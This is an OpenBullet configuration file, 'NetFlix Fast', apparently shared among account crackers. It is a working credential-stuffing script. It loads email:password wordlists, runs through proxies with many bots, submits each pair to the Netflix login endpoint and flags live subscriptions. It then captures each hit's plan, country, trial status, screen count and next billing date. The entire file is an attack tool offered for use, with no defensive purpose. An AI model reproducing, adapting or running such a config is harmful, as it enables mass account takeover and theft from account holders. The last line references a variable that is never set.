[SETTINGS]
{
  "CreatorLK": "OB-593995e3c40ad6ae8abd0249d982c9bf-LoliKEY",
  "Name": "NetFlix Fast",
  "SuggestedBots": 100,
  "LastModified": "2019-04-29T10:13:56.4040694+05:30",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "Gust",
  "isWtoEdit": false,
  "Author": "Dark4DS",
  "Version": "1.2.2.4",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Get REQUEST GET "https://www.netflix.com/Ph/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 

PARSE "<SOURCE>" LR "name=\"authURL\" value=\"" "\"" -> VAR "authURL" 

FUNCTION URLEncode "<authURL>" -> VAR "AUTH" 

#Login REQUEST POST "https://www.netflix.com/Login?nextpage=https%3A%2F%2Fwww.netflix.com%2FYourAccount" 
  CONTENT "authURL=<AUTH>&email=<USER>&password=<PASS>&withFields=email%2Cpassword%2CrememberMe%2CnextPage%2CshowPassword&rememberMe=True&flow=websiteSignUp&mode=login&action=loginAction&nextPage=https%3A%2F%2Fwww.netflix.com%2FYourAccount&showPassword=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Referer: https://www.netflix.com/lk/login" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\":\"unrecognized_email\"},\"" 
    KEY "\"value\":\"incorrect_password\"}" 
  KEYCHAIN Success OR 
    KEY "\"membershipStatus\":\"CURRENT_MEMBER\"" 

#Subscription PARSE "<SOURCE>" LR "\"currentPlanName\":\"" "\"" -> CAP "Subscription" 

#Country PARSE "<SOURCE>" LR "\",\"currentCountry\":\"" "\"" -> CAP "Country" 

#Trial PARSE "<SOURCE>" LR "\"isInFreeTrial\":" "\"" -> CAP "Trial" 

#DVD PARSE "<SOURCE>" LR "\"isDVD\"" "\"" -> CAP "DVD" 

#Screens PARSE "<SOURCE>" LR "\"maxStreams\"" "\"" -> CAP "Screens" 

#HD PARSE "<SOURCE>" LR "\"hasHD\"" "," -> CAP "HD" 

#Ultra_HD PARSE "<SOURCE>" LR "\"hasUHD\"" "," -> CAP "Ultra HD" 

#Next_Billing PARSE "<SOURCE>" LR "\"nextBillingDate\"" "\"," -> CAP "Next Billing" 

FUNCTION Replace "\x2F" "\" "<Billing>" -> VAR "Next Billing" 

